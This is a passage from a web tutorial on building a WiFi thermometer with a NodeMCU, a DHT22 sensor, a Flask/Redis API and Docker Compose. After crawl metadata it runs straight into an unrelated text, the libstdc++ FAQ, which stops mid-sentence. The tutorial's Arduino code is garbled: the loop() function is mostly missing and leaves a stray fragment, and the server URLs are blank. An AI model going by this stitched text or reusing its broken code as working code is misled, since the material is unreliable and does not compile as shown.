it to a Restful API which can store this data and then make it available for display by some client: if (WiFi.status() != WL_CONNECTED) { setup_wifi(); } else { HTTPClient http; http.begin(""); http.addHeader("Content-Type", "text/plain"); int httpCode = http.POST(String(temperature)); http.end(); } First, we have to check if we are still connected to our WiFi network. If not, we will simply call the setup_wifi() method again. Once we have established a connection, we can use the ESP8266HTTPClient library to send the sensor data to our API, which will be hosted on in my case. As you can see, I’m only sending the temperature data for now, but you can easily extend this code and also send the humidity data if you want. For now, nothing will change if you run this code. This is because we haven’t created our API yet. So let’s go ahead and do that. setup_wifi() If you got lost during any of the above steps, here is the full source code of our NodeMcu: #include <SimpleDHT.h> #include <ESP8266WiFi.h> #include <ESP8266HTTPClient.h> const char* ssid = "***"; const char* password = "***"; void setup_wifi() { WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(1000); Serial.println("Connecting..."); } Serial.println("Connected successfully."); } void setup() { pinMode(2, OUTPUT); Serial.begin(115200); setup_wifi(); }%"); if (WiFi.status() != WL_CONNECTED) { setup_wifi(); } else { HTTPClient http; http.begin(""); http.addHeader("Content-Type", "text/plain"); int httpCode = http.POST(String(temperature)); http.end(); } delay(2500); } Now that our NodeMcu is running and happily sending data, let’s create an API to consume that data. Using Python and the Flask framework, we can set up a simple API with less than 10 lines of code: #!flask/bin/python from flask import Flask from flask_cors import CORS app = Flask(__name__, static_url_path='') CORS(app) if __name__ == '__main__': app.run(debug=True, host='0.0.0.0') As you can see, I provided the static_url_path parameter. We will need this later so Flask can find and serve our HTML file. To give our API some power, we have to create a new controller for our thermometer API. For this, I created a new therm.py file inside a new /controllers directory: static_url_path therm.py /controllers from flask import Flask, Blueprint, request, jsonify import flask import redis red = redis.StrictRedis.from_url('redis://redis:6379/0') therm_controller = Blueprint('therm', 'therm', url_prefix='/therm') def therm_stream(): pub_sub = red.pubsub() pub_sub.subscribe('therm') for message in pub_sub.listen(): if isinstance(message['data'], (bytes, bytearray)): result = message['data'].decode('utf-8') yield 'data: %s\n\n' % result @therm_controller.route('/push', methods=['POST']) def post(): message = flask.request.data red.publish('therm', message) return flask.Response(status=204) @therm_controller.route('/stream') def stream(): return flask.Response(therm_stream(), mimetype="text/event-stream") As you can see, we are using Flask blueprints here to make it easier to expose this new controller to our app.py file. Our NodeMcu will use the post method with the '/push' route. This method reads the request data which contains the sensor data from our NodeMcu and stores it in a Redis database defined above. The stream method will then subscribe to a push stream defined in the stream method which is populated everytime the NodeMcu pushes data to the API. This way we avoid polling and can always display the latest temperature on our client. therm_stream is a simple helper function that listens to changes in our Redis database and decodes this data for display. Since we have to listen to this stream continuously, this function is implemented as a generator. app.py '/push' stream therm_stream To connect our new controller with our API, let’s include it in our app.py file: #!flask/bin/python from flask import Flask from flask_cors import CORS from controllers.therm import therm_controller app = Flask(__name__, static_url_path='') app.register_blueprint(therm_controller) CORS(app) if __name__ == '__main__': app.run(debug=True, host='0.0.0.0') Finally, we can implement a client to consume this API. Inside a new /static directory, create a new index.html file: /static <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>mcu Therm</title> </head> <body> <h2 id="temp" /> </body> </html> <script> function subscribe() { var source = new EventSource('/therm/stream'); var tempDiv = document.getElementById('temp'); source.onmessage = function(e) { tempDiv.innerHTML = "Temparature: " + e.data + "°C"; }; }; subscribe(); </script> I placed the content inside a simple h2 element without any CSS to keep things simple. We can subscribe to our API with some simple Javascript calls using the EventSource class. It’s onmessage method is triggered whenever the stream is populated by the API. All we have to do then is update the innerHTML of our content. As you can see I chose °C as the display unit (which is also what the NodeMcu sends). Feel free to add conversions to °F or Kelvin if you want. We can download this new HTML page directly from our Flask API. To do so, we can define a new route in our app.py file: h2 EventSource onmessage innerHTML @app.route('/') def root(): return app.send_static_file('index.html') Since this file is also the entry point to our program, I named the route simply /. The send_static_file method will then take care of returning this HTML page to our client. / send_static_file To easily spin up, run and deploy our new App, we are going to initialize all our services using Docker Compose. We only need two services: Redis and the Flask API. We can spin both of them up using this simple docker-compose.yml file, placed in the root directory of the project: docker-compose.yml version: '3' services: redis: image: redis command: redis-server /usr/local/etc/redis/redis.conf container_name: redis volumes: - /redis.conf:/usr/local/etc/redis/redis.conf ports: - "6379:6379" web: build: ./src/webapp working_dir: /var/www/app ports: - "5000:5000" volumes: - ./src/webapp:/var/www/app:rw depends_on: - redis Make sure that the web service runs only after redis is initialized and check that all the ports used here match those used in the Python code. Now we can start our App using the docker-compose up command. Once everything is spun up, open a new browser tab and go to. Until we send some data to our Flask API, we will only see an empty page. So, let’s go ahead and turn on our microcontroller. After a few seconds, you should see something like this: web redis docker-compose up width="529" data-src="/KB/boards-embedded-devices/1277175/ef487c2f-3d66-46a9-9a88-7f4675d4027f.Png" data-sizes="auto" data-> You can also see how this value changes from time to time. You can see what`s happening under the hood by opening a browser console and navigating to the Network tab: width="678" data-src="/KB/boards-embedded-devices/1277175/431b5e62-8240-49a9-ab2a-70729e1ac737.Png" data-sizes="auto" data-> That’s it, our homemade thermometer app is ready! Feel free to play around with the source code and deploy it wherever you want, for example on a Raspberry Pi with an external display. Let me know if you have any questions, hints.
https://codeproject.freetls.fastly.net/Articles/1277175/WiFi-thermometer-using-NodeMCU-DHT22-and-Flask?msg=5597077#xx5597077xx
CC-MAIN-2021-43
refinedweb
2,254
57.77
Im trying to create two buttons on a page. Each one I would like to carry out a different python script on the server. So far I have only managed to get/collect one button using def contact(): form = ContactForm() if request.method == 'POST': return 'Form posted.' elif request.method == 'GET': return render_template('contact.html', form=form) Give your two buttons the same name and different values: <input type="submit" name="submit" value="Do Something"> <input type="submit" name="submit" value="Do Something Else"> Then in your Flask view function you can tell which button was used to submit the form: def contact(): if request.method == 'POST': if request.form['submit'] == 'Do Something': pass # do something elif request.form['submit'] == 'Do Something Else': pass # do something else else: pass # unknown elif request.method == 'GET': return render_template('contact.html', form=form)
https://codedump.io/share/M401Og7Cx4E0/1/flask-python-buttons
CC-MAIN-2017-43
refinedweb
140
59.4
Efficiency Through the Looking-Glass different major. It was kind of like saying to treasure hunters, "Yeah, those pirate's chests full of gold coins are nice, but look what's in this cave back here...." Well, efficiency has a double-edged sword. Twenty years ago, switching converters were a lot harder to justify (except in PC power supplies, where there really wasn't any choice anymore, and the sales volumes made it the norm rather than the exception), and in many cases just going from a linear regulator to a switching converter was enough to keep people satisfied for power consumption. Now it's a lot less expensive, and there are demands to achieve certain efficiency standards: where power supplies were 80% efficient, now people want them to be 90% efficient or 95% efficient; where some high-power converters were 95% efficient, people want them to be 97% efficient. A former coworker of mine, who's a systems engineer working on batteries and motors, used to harp on the fact that efficiency was a misleading statistic; people should really focus on power losses instead. This article is dedicated to his philosophy and to spreading the word. Welcome to Efficiencyland First of all, what is efficiency? It's the ratio of delivered power to consumed power: if you draw 100 watts from the AC mains, and you deliver 90 watts of mechanical power with a motor, then that motor is 90% efficient. But really this is backwards: nobody goes to a store and says "I have an electric outlet that supplies 100W, what's the most efficient motor you have? Ooh, that's 90% efficient, that means I get 90W of mechanical power out!" In reality it's demand driven: you need that 90W of mechanical power no matter how efficient or inefficient the motor is. If the motor's 50% efficient, you draw 180W from the AC mains. If the motor's 95% efficient, you draw 94.7W from the AC mains. Mathematically, we have this equation for the efficiency η: $$ \eta = \frac{P _ {out}}{P _ {in}} = \frac{P _ {out}}{P _ {out} + P _ {loss}} $$ Let's invert the equation: $$ \frac{1}{\eta} = \frac{P _ {in}}{P _ {out}} = \frac{P _ {out} + P _ {loss}}{P _ {out} } = 1 + \frac{ P _ {loss}}{P _ {out}}$$ If something is 50% efficient, the losses are equal to Pout. If something is 80% efficient, the losses are equal to 25% of Pout. If something is 95% efficient, the losses are equal to 1/19 of Pout. You get the picture. In fact, I would call this the relative inefficiency, a backwards epsilon: ∍ $$ \ni \, = \frac{ P _ {loss}}{P _ {out}} = \frac{1}{\eta} - 1 $$ Inefficiency in power calculations is just like a sales tax. In most cases you're going to spend the energy you need to, in order to deliver the output power, and this extra energy is an unwanted but necessary cost of power transfer. (In a few cases, like battery-powered devices, the amount of energy you can spend is a fixed constraint, and here efficiency tells you how much of it you have available to use.) But a lot of times it's not even relative inefficiency that makes sense to calculate; the losses themselves are the most important thing. Here's a graph of efficiency vs. output current for a small 2W power supply (Recom RS series): We'll do one of my favorite activities (don't miss the sarcasm), called Read the Data Off the Datasheet Graph. Let's see, at 5% load the efficiency's about 20%; at 10% load it's about 33% efficient, at 20% load it's about 50% efficient, at 40% load it's about 66% efficient, at 60% load it's about 75% efficient, at 80% load it's about 79% efficient, and at 100% load it's about 81% efficient. Let's graph power loss (as a fraction of maximum load) as a function of load power: import numpy as np import matplotlib.pyplot as plt Pout = np.array([0.05, 0.1, 0.2, 0.4, 0.6, 0.8, 1.0]) eff = np.array([0.2, 0.33, 0.5, 0.66, 0.75, 0.79, 0.81]) Ploss = (1/eff - 1)*Pout plt.plot(Pout,Ploss) plt.xlabel('output power (fraction of max load)') plt.ylabel('power loss'); Huh, that's kind of interesting; the power loss is relatively constant, about 20% of max load (20% of 2W = 0.4W in this case), until you get to higher loads where the power loss goes up a little bit, maybe 10% of the increase in load power above 60% of maximum load: incrementally this power supply is about 90% efficient; for every 100mW of extra output power, it uses up 10mW of extra input power. At low load levels it takes a certain amount of power (again, 0.4W in this case) just to operate. And this kind of information is more directly useful. If you're careful, and you have access to a well-insulated thermal chamber (aka "styrofoam beer cooler") you can actually measure power loss directly: Put your power conversion system inside a thermal chamber, aside from the wires leading into and out of it, along with a thermocouple tied to a small block of metal (I like aluminum) for stability. Put the block of metal in close thermal proximity to your power conversion system. That usually means to attach the two directly together; if the power conversion system has a flat heat plate, place it directly against the block of metal, so the surfaces are next to each other. Thermally conductive grease is an option, but not really necessary as long as the thermal chamber is well-insulated. Run it for a specific amount of time T, while taking temperature readings. You will want to do this for a time that is long enough so see a measurable temperature rise, but not long enough that the power conversion system overheats or the rate of increase in temperature drops off and the temperature begins to stabilize. Calculate energy loss = temperature rise (in degrees C = degrees K) * thermal capacity in joules per kelvin. What's the thermal capacity? Well, if your block of metal is a common type of metal, you can calculate it by knowing the specific heat capacity, and multiplying by the metal mass; aluminum's is 0.897 joules / kelvin per gram. But it may be better to just figure out the heat capacity empirically, by doing the same experiment with a known amount of power loss, e.g. a power resistor tied to the block of metal, where you run a fixed current through it. If the power conversion system has an appreciable amount of metal itself, either make sure the block of metal is much larger, or you'll have to estimate the thermal capacity of the power conversion system. Then compute power loss by taking the energy loss and dividing by the time T. It's even better if you graph the temperature readings vs. time and compute the initial slope once it starts heating up: from scipy.signal import lfilter t = np.linspace(0,720,120) dt = t[1]-t[0] P = np.ones_like(t)*100 plt.figure(figsize=(10,5),dpi=80) plt.plot(t,P) a1 = 0.08*(dt/60) a2 = 4*(dt/60) lpf1 = lambda x, alpha: lfilter([alpha],[1,alpha-1],x) def frepeat(f,n,*args): def h(x): y = x for i in xrange(n): y = f(y, *args) return y return h temperature = lpf1(frepeat(lpf1,4,a2)(P),a1) plt.plot(t,temperature,'.') tfit = [0.42*60,5*60]; tempfit=[0,32] plt.plot(tfit,tempfit,'-') plt.ylim(0,60); plt.xlim(0,720); plt.xticks(np.arange(13)*60) plt.xlabel('time (sec)') plt.ylabel('temperature rise (C)') m = (tempfit[1]-tempfit[0])/(tfit[1]-tfit[0]) plt.legend(('raw data','max slope = %.3f' % m),'best') This gives you the temperature rise rate (kelvins per second), and you can multiply by thermal capacity to get joules per second = power in watts. Empirical measurements are fun! They take a while to setup correctly, and although it's tough to estimate exactly how accurate they are, often they are more accurate than theoretical calculations where you make an incorrect assumption. Empirical measurements of power losses using this technique are also usually more accurate than subtracting input and output power measurements. If you're measuring a 95% efficient power supply running at 100W input and 95W output, and you have voltage and current measurements that each have 0.2% error, you could be off by 0.4W in input power, and 0.4W in output power, meaning up to 0.8W worst-case error in power loss when you subtract the two (100.4W - 94.6W = 5.8W, or 99.6W - 95.4W = 4.2W, vs. the exact amount of 5.0W). That's 16% error in a 5W power loss measurement, from 0.2% accuracy test equipment! It's not too difficult to do better if you measure power loss directly via temperature rise measurements. So... why do we care about power losses? The reason to talk about losses comes into play when the efficiency gets closer to 100%. When we talk about systems that are 94% efficient and 97% efficient, they sound about the same, whereas in reality the 97% efficient system has only half the power losses of the 94% efficient system. What's the impact on your power budget between these two systems? Probably not too much; you'd pay a little more for the extra energy used in a 94% efficient system. It may or may not be worth the extra cost of a 97% efficient system. But from a system design standpoint, the 97% efficient system is only allowed to waste half as much power as its 94% efficient competitor! That's a huge change in design requirements, and not very easy to achieve even with modern power supply design techniques. In fact, the only real driver of high-efficiency in the above-90% market (aside from marketing power, or meeting a high-efficiency standard) is keeping power losses low for thermal reasons: If I have a 10kW power converter that is 94% efficient, it has to dissipate 640W of heat. If I have a 10kW power converter that is 97% efficient, it only has to dissipate 310W of heat. That means less expensive fans or heat sinks, or no fans (natural convection cooling), or components that don't get as hot. But as far as the cost of the power goes, we're talking 10.64kW vs. 10.31kW; not a very big change. Summary - Power losses matter a lot more than efficiency metrics, especially if you're working with high-efficiency systems. - Determining power losses at different operating points may give you better insights than efficiency into the weaknesses of a power conversion system: for example, quiescent power loss plus incremental losses. - You can measure power loss directly in a thermal chamber by determining the thermal capacity and temperature rise rate. Think about these issues the next time you work on a system that has power efficiency specifications. May your power electronics always stay cool! Previous post by Jason Sachs: How to Estimate Encoder Velocity Without Making Stupid Mistakes: Part II (Tracking Loops and PLLs) Next post by Jason Sachs: March is Oscilloscope Month — and at Tim Scale! - Write a CommentSelect to add a comment By analogy, efficiency numbers are unhelpful in the same way miles-per-gallon is unhelpful for cars: /> import numpy as np import matplotlib.pyplot as plt Unsure why it doesn't want to plot on my.
https://www.electronics-related.com/showarticle/533/efficiency-through-the-looking-glass
CC-MAIN-2018-39
refinedweb
1,974
60.95
2008-2014 FSF 1.1. What is libstdc++? The GNU Standard C++ Library v3 is an ongoing project to implement the ISO 14882 Standard C++ library as described in clauses 17 through 30 and annex D. For those who want to see exactly how far the project has come, or just want the latest bleeding-edge code, the up-to-date source is available over anonymous SVN, and can be browsed over the web. 1.2. Why should I use libstdc++? The completion of the initial ISO C++ standardization effort gave the C++ community a powerful set of reuseable tools in the form of the C++ Standard Library. However, for several years C++ implementations were (as the Draft Standard used to say) “incomplet and incorrekt”, and many suffered from limitations of the compilers that used them. The GNU compiler collection (gcc, g++, etc) is widely considered to be one of the leading compilers in the world. Its development is overseen by the GCC team. All of the rapid development and near-legendary portability that are the hallmarks of an open-source project are applied to libstdc++. All of the standard classes and functions from C++98/C++03 (such as string, vector<>, iostreams, algorithms etc.) are freely available and atempt to be fully compliant. Work is ongoing to complete support for the current revision of the ISO C++ Standard. string vector<> 1.3. Who's in charge of it? The libstdc++ project is contributed to by several developers all over the world, in the same way as GCC or the Linux kernel. The current maintainers are listed in the MAINTAINERS file (look for "c++ runtime libs"). MAINTAINERS Development and discussion is held on the libstdc++ mailing list. Subscribing to the list, or searching the list archives, is open to everyone. You can read instructions for doing so on the GCC mailing lists page. If you have questions, ideas, code, or are just curious, sign up! 1.4. When is libstdc++ going to be finished? Nathan Myers gave the best of all possible answers, responding to a Usenet article asking this question: Sooner, if you 1.5. How do I contribute to the effort? See the Contributing section in the manual. Subscribing to the mailing list (see above, or the homepage) is a very good idea if you have something to contribute, or if you have spare time and want to help. Contributions don't have to be in the form of source code; anybody who is willing to help write documentation, for example, or has found a bug in code that we all thought was working and is willing to provide details, is more than welcome! 1.6. What happened to the older libg++? I need that! The last libg++ README states “This package is considered obsolete and is no longer being developed.” It should not be used for new projects, and won't even compile with recent releases of GCC (or most other C++ compilers). More information can be found in the Backwards Compatibility section of the libstdc++ manual. 1.7. What if I have more questions? If you have read the documentation, and your question remains unanswered, then just ask the mailing list. At present, you do not need to be subscribed to the list to send a message to it. More information is available on the homepage (including how to browse the list archives); to send a message to the list, use <libstdc++@gcc.gnu.org>. <libstdc++@gcc.gnu.org> If you have a question that you think should be included here, or if you have a question about a question/answer here, please send email to the libstdc++ mailing list, as above. 2.1. What are the license terms for libstdc++? See our license description for these and related questions. 2.2. So any program which uses libstdc++ falls under the GPL? No. The special exception permits use of the library in proprietary applications. 2.3. How is that different from the GNU {Lesser,Library} G. 2.4. I see. So, what restrictions are there on programs that use the library? None. We encourage such programs to be released as free software, but we won't punish you or sue you if you choose otherwise. 3.1. How do I install libstdc++? Often libstdc++ comes pre-installed as an integral part of many existing GNU/Linux and Unix systems, as well as many embedded development tools. It may be necessary to install extra development packages to get the headers, or the documentation, or the source: please consult your vendor for details. To build and install from the GNU GCC sources, please consult the setup documentation for detailed instructions. You may wish to browse those files ahead of time to get a feel for what's required. 3.2. How does one get current libstdc++ sources? Libstdc++ sources for all official releases can be obtained as part of the GCC sources, available from various sites and mirrors. A full list of download sites is provided on the main GCC site. Current libstdc++ sources can always be checked out of the main GCC source repository using the appropriate version control tool. At this time, that tool is Subversion. Subversion, or SVN, is one of several revision control packages. It was selected for GNU projects because it's free (speech), free (beer), and very high quality. The Subversion home page has a better description. The “anonymous client checkout” feature of SVN is similar to anonymous FTP in that it allows anyone to retrieve the latest libstdc++ sources. For more information see SVN details. 3.3. How do I know if it works? Libstdc++ comes with its own validation testsuite, which includes conformance testing, regression testing, ABI testing, and performance testing. Please consult the testing documentation for GCC and Test in the libstdc++ manual for more details. If you find bugs in the testsuite programs themselves, or if you think of a new test program that should be added to the suite, please write up your idea and send it to the list! 3.4. How do I insure that the dynamically linked library will be found? Depending on your platform and library version, the error message might be similar to one of the following: ./a.out: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory /usr/libexec/ld-elf.so.1: Shared object "libstdc++.so.6" not found++ is not in this list then the libraries won't be found. If you already have an older version of libstdc++ installed then the error might look like one of the following instead: ./a.out: /usr/lib/libstdc++.so.6: version `GLIBCXX_3.4.20' not found ./a.out: /usr/lib/libstdc++.so.6: version `CXXABI_1.3.8' not found This means the linker found /usr/lib/libstdc++.so.6 but that library belongs to an older version of GCC than was used to compile and link the program a.out (or some part of it). The program depends on code defined in the newer libstdc++ that belongs to the newer version of GCC, so the linker must be told how to find the newer libstdc++ shared library. /usr/lib/libstdc++.so.6 a.out The simplest way to fix this is to use the LD_LIBRARY_PATH environment variable, which is a colon-separated list of directories in which the linker will search for shared libraries: LD_LIBRARY_PATH export LD_LIBRARY_PATH=${prefix}/lib:$LD_LIBRARY_PATH Here the shell variable ${prefix} is assumed to contain the directory prefix where GCC was installed to. The directory containing the library might depend on whether you want the 32-bit or 64-bit copy of the library, so for example would be ${prefix}/lib64 on some systems. The exact environment variable to use will depend on your platform, e.g. DYLD_LIBRARY_PATH for Darwin, LD_LIBRARY_PATH_32/LD_LIBRARY_PATH_64 for Solaris 32-/64-bit, and SHLIB_PATH for HP-UX. ${prefix} ${prefix}/lib64 DYLD_LIBRARY_PATH LD_LIBRARY_PATH_32 LD_LIBRARY_PATH_64 SHLIB_PATH See the man pages for ld, ldd and ldconfig for more information. The dynamic linker has different names on different platforms but the man page is usually called something such as ld.so, rtld or dld.so. ld.so rtld dld.so Using LD_LIBRARY_PATH is not always the best solution, Finding Dynamic or Shared Libraries in the manual gives some alternatives. 3.5. What's libsupc++? If the only functions from libstdc++.a which you need are language support functions (those listed in clause 18 of the standard, e.g., new and delete), then try linking against libsupc++.a, which is a subset of libstdc++.a. (Using gcc instead of g++ and explicitly linking in libsupc++.a via -lsupc++ for the final link step will do it). This library contains only those support routines, one per object file. But if you are using anything from the rest of the library, such as IOStreams or vectors, then you'll still need pieces from libstdc++.a. libstdc++.a new delete libsupc++.a -lsupc++ 3.6. This library is HUGE! Usually the size of libraries on disk isn't noticeable. When a link editor (or simply “linker”) pulls things from a static archive library, only the necessary object files are copied into your executable, not the entire library. Unfortunately, even if you only need a single function or variable from an object file, the entire object file is extracted. (There's nothing unique to C++ or libstdc++ about this; it's just common behavior, given here for background reasons.) Some of the object files which make up libstdc++.a are rather large. If you create a statically-linked executable with -static, those large object files are suddenly part of your executable. Historically the best way around this was to only place a very few functions (often only a single one) in each source/object file; then extracting a single function is the same as extracting a single .o file. For libstdc++ this is only possible to a certain extent; the object files in question contain template classes and template functions, pre-instantiated, and splitting those up causes severe maintenance headaches. -static .o On supported platforms, libstdc++ takes advantage of garbage collection in the GNU linker to get a result similar to separating each symbol into a separate source and object files. On these platforms, GNU ld can place each function and variable into its own section in a .o file. The GNU linker can then perform garbage collection on unused sections; this reduces the situation to only copying needed functions into the executable, as before, but all happens automatically. 4.1. Can libstdc++ be used with non-GNU compilers? Perhaps. Since the goal of ISO Standardization is for all C++ implementations to be able to share code, libstdc++ should be usable under any ISO-compliant compiler, at least in theory. However, the reality is that libstdc++ is targeted and optimized for GCC/G++. This means that often libstdc++ uses specific, non-standard features of G++ that are not present in older versions of proprietary compilers. It may take as much as a year or two after an official release of GCC that contains these features for proprietary tools to support these constructs. Recent versions of libstdc++ are known to work with the Clang compiler. In the near past, specific released versions of libstdc++ have been known to work with versions of the EDG C++ compiler, and vendor-specific proprietary C++ compilers such as the Intel ICC C++ compiler. 4.2. No 'long long' type on Solaris? By default we try to support the C99 long long type. This requires that certain functions from your C library be present. Up through release 3.0.2 the platform-specific tests performed by libstdc++ were too general, resulting in a conservative approach to enabling the long long code paths. The most commonly reported platform affected was Solaris. This has been fixed for libstdc++ releases greater than 3.0.3. 4.3. _XOPEN_SOURCE and _GNU_SOURCE are always defined? _XOPEN_SOURCE _GNU_SOURCE On Solaris, g++ (but not gcc) always defines the preprocessor macro _XOPEN_SOURCE. On GNU/Linux, the same happens with _GNU_SOURCE. (This is not an exhaustive list; other macros and other platforms are also affected.) These macros are typically used in C library headers, guarding new versions of functions from their older versions. The C++98 standard library includes the C standard library, but it requires the C90 version, which for backwards-compatibility reasons is often not the default for many vendors. More to the point, the C++ standard requires behavior which is only available on certain platforms after certain symbols are defined. Usually the issue involves I/O-related typedefs. In order to ensure correctness, the compiler simply predefines those symbols. Note that it's not enough to #define them only when the library is being built (during installation). Since we don't have an 'export' keyword, much of the library exists as headers, which means that the symbols must also be defined as your programs are parsed and compiled. #define To see which symbols are defined, look for CPLUSPLUS_CPP_SPEC in the gcc config headers for your target (and try changing them to see what happens when building complicated code). You can also run g++ -E -dM - < /dev/null" to display a list of predefined macros for any particular installation. CPLUSPLUS_CPP_SPEC This has been discussed on the mailing lists quite a bit. This method is something of a wart. We'd like to find a cleaner solution, but nobody yet has contributed the time. 4.4. Mac OS X ctype.h is broken! How can I fix it? ctype.h This answer is old and probably no longer be relevant. This was a long-standing bug in the OS X support. Fortunately, the patch was quite simple, and well-known. 4.5. Threading is broken on i386? Support for atomic integer operations was broken on i386 platforms. The assembly code accidentally used opcodes that are only available on the i486 and later. So if you configured GCC to target, for example, i386-linux, but actually used the programs on an i686, then you would encounter no problems. Only when actually running the code on a i386 will the problem appear. This is fixed in 3.2.2. 4.6. MIPS atomic operations The atomic locking routines for MIPS targets requires MIPS II and later. A patch went in just after the 3.3 release to make mips* use the generic implementation instead. You can also configure for mipsel-elf as a workaround. The mips*-*-linux* port continues to use the MIPS II routines, and more work in this area is expected. 4.7. Recent GNU/Linux glibc required? When running on GNU/Linux, libstdc++ 3.2.1 (shared library version 5.0.1) and later uses localization and formatting code from the system C library (glibc) version 2.2.5 which contains necessary bugfixes. All GNU/Linux distros make more recent versions available now. libstdc++ 4.6.0 and later require glibc 2.3 or later for this localization and formatting code. The guideline is simple: the more recent the C++ library, the more recent the C library. (This is also documented in the main GCC installation instructions.) 4.8. Can't use wchar_t/wstring on FreeBSD Older versions of FreeBSD's C library do not have sufficient support for wide character functions, and as a result the libstdc++ configury decides that wchar_t support should be disabled. In addition, the libstdc++ platform checks that enabled wchar_t were quite strict, and not granular enough to detect when the minimal support to enable wchar_t and C++ library structures like wstring were present. This impacted Solaris, Darwin, and BSD variants, and is fixed in libstdc++ versions post 4.1.0. wstring 5.1. What works already? Short answer: Pretty much everything works except for some corner cases. Support for localization in locale may be incomplete on some non-GNU platforms. Also dependent on the underlying platform is support for wchar_t and long long specializations, and details of thread support. locale Long answer: See the implementation status pages for C++98, TR1, and C++11. C++14. 5.2. Bugs in the ISO C++ language or library specification Unfortunately, there are some. For those people who are not part of the ISO Library Group (i.e., nearly all of us needing to read this page in the first place), a public list of the library defects is occasionally published on the WG21 website. Many of these issues have resulted in code changes in libstdc++. If you think you've discovered a new bug that is not listed, please post a message describing your problem to the author of the library issues list. 5.3. Bugs in the compiler (gcc/g++) and not libstdc++ On occasion, the compiler is wrong. Please be advised that this happens much less often than one would think, and avoid jumping to conclusions. First, examine the ISO C++ standard. Second, try another compiler or an older version of the GNU compilers. Third, you can find more information on the libstdc++ and the GCC mailing lists: search these lists with terms describing your issue. Before reporting a bug, please examine the bugs database with the category set to “g++”. 6.1. Reopening a stream fails One of the most-reported non-bug reports. Executing a sequence like: #include <fstream> ... std::fstream fs("a_file"); // . // . do things with fs... // . fs.close(); fs.open("a_new_file"); All operations on the re-opened fs will fail, or at least act very strangely. Yes, they often will, especially if fs reached the EOF state on the previous file. The reason is that the state flags are not cleared on a successful call to open(). The standard unfortunately did not specify behavior in this case, and to everybody's great sorrow, the proposed LWG resolution in DR #22 is to leave the flags unchanged. You must insert a call to fs.clear() between the calls to close() and open(), and then everything will work like we all expect it to work. Update: for GCC 4.0 we implemented the resolution of DR #409 and open() now calls clear() on success! fs fs.clear() clear() 6.2. -Weffc++ complains too much Many warnings are emitted when -Weffc++ is used. Making libstdc++ -Weffc++-clean is not a goal of the project, for a few reasons. Mainly, that option tries to enforce object-oriented programming, while the Standard Library isn't necessarily trying to be OO. -Weffc++ We do, however, try to have libstdc++ sources as clean as possible. If you see some simple changes that pacify -Weffc++ without other drawbacks, send us a patch. 6.3. Ambiguous overloads after including an old-style header Another problem is the rel_ops namespace and the template comparison operator functions contained therein. If they become visible in the same namespace as other comparison functions (e.g., “using” them and the <iterator> header), then you will suddenly be faced with huge numbers of ambiguity errors. This was discussed on the -v3 list; Nathan Myers sums things up here. The collisions with vector/string iterator types have been fixed for 3.1. rel_ops 6.4. The g++-3 headers are not ours If you are using headers in ${prefix}/include/g++-3, or if the installed library's name looks like libstdc++-2.10.a or libstdc++-libc6-2.10.so, then you are using the old libstdc++-v2 library, which is non-standard and unmaintained. Do not report problems with -v2 to the -v3 mailing list. ${prefix}/include/g++-3 libstdc++-2.10.a libstdc++-libc6-2.10.so For GCC versions 3.0 and 3.1 the libstdc++ header files are installed in ${prefix}/include/g++-v3 (see the 'v'?). Starting with version 3.2 the headers are installed in ${prefix}/include/c++/${version} as this prevents headers from previous versions being found by mistake. ${prefix}/include/g++-v3 ${prefix}/include/c++/${version} 6.5. Errors about *Concept and constraints in the STL If you see compilation errors containing messages about foo Concept and something to do with a constraints member function, then most likely you have violated one of the requirements for types used during instantiation of template containers and functions. For example, EqualityComparableConcept appears if your types must be comparable with == and you have not provided this capability (a typo, or wrong visibility, or you just plain forgot, etc). More information, including how to optionally enable/disable the checks, is available in the Diagnostics. chapter of the manual. 6.6. Program crashes when using library code in a dynamically-loaded library If you are using the C++ library across dynamically-loaded objects, make certain that you are passing the correct options when compiling and linking: Compile your library components: g++ -fPIC -c a.cc g++ -fPIC -c b.cc ... g++ -fPIC -c z.cc Create your library: g++ -fPIC -shared -rdynamic -o libfoo.so a.o b.o ... z.o Link the executable: g++ -fPIC -rdynamic -o foo ... -L. -lfoo -ldl 6.7. “Memory leaks” in containers A few people have reported that the standard containers appear to leak memory when tested with memory checkers such as valgrind. Under some configurations the library's allocators keep free memory in a pool for later reuse, rather than returning it to the OS. Although this memory is always reachable by the library and is never lost, memory debugging tools can report it as a leak. If you want to test the library for memory leaks please read Tips for memory leak hunting first. 6.8. list::size() is O(n)! See the Containers chapter. 6.9. Aw, that's easy to fix! If you have found a bug in the library and you think you have a working fix, then send it in! The main GCC site has a page on submitting patches that covers the procedure, but for libstdc++ you should also send the patch to our mailing list in addition to the GCC patches mailing list. The libstdc++ contributors' page also talks about how to submit patches. In addition to the description, the patch, and the ChangeLog entry, it is a Good Thing if you can additionally create a small test program to test for the presence of the bug that your patch fixes. Bugs have a way of being reintroduced; if an old bug creeps back in, it will be caught immediately by the testsuite - but only if such a test exists. 7.1. string::iterator is not char*; vector<T>::iterator is not T* If you have code that depends on container<T> iterators being implemented as pointer-to-T, your code is broken. It's considered a feature, not a bug, that libstdc++ points this out. While there are arguments for iterators to be implemented in that manner, A) they aren't very good ones in the long term, and B) they were never guaranteed by the Standard anyway. The type-safety achieved by making iterators a real class rather than a typedef for T* outweighs nearly all opposing arguments. Code which does assume that a vector iterator i is a pointer can often be fixed by changing i in certain expressions to &*i. Future revisions of the Standard are expected to bless this usage for vector<> (but not for basic_string<>). i &*i 7.2. What's next after libstdc++? Hopefully, not much. The goal of libstdc++ is to produce a fully-compliant, fully-portable Standard Library. After that, we're mostly done: there won't be any more compliance work to do. There is an effort underway to add significant extensions to the standard library specification. The latest version of this effort is described in The C++ Library Technical Report 1. 7.3. What about the STL from SGI? The STL from SGI, version 3.3, was the final merge of the STL codebase. The code in libstdc++ contains many fixes and changes, and the SGI code is no longer under active development. We expect that no future merges will take place. In particular, string is not from SGI and makes no use of their "rope" class (which is included as an optional extension), nor is valarray and some others. Classes like vector<> are, but have been extensively modified. valarray More information on the evolution of libstdc++ can be found at the API evolution and backwards compatibility documentation. The FAQ for SGI's STL is still recommended reading. 7.4. Extensions and Backward Compatibility See the link on backwards compatibility and link on evolution. 7.5. Does libstdc++ support TR1? Yes. The C++ Standard Library Technical Report adds many new features to the library. The latest version of this effort is described in Technical Report 1. The implementation status of TR1 in libstdc++ can be tracked on the TR1 status page. 7.6. How do I get a copy of the ISO C++ Standard? their website is right here. (And if you've already registered with them, clicking this link will take you to directly to the place where you can 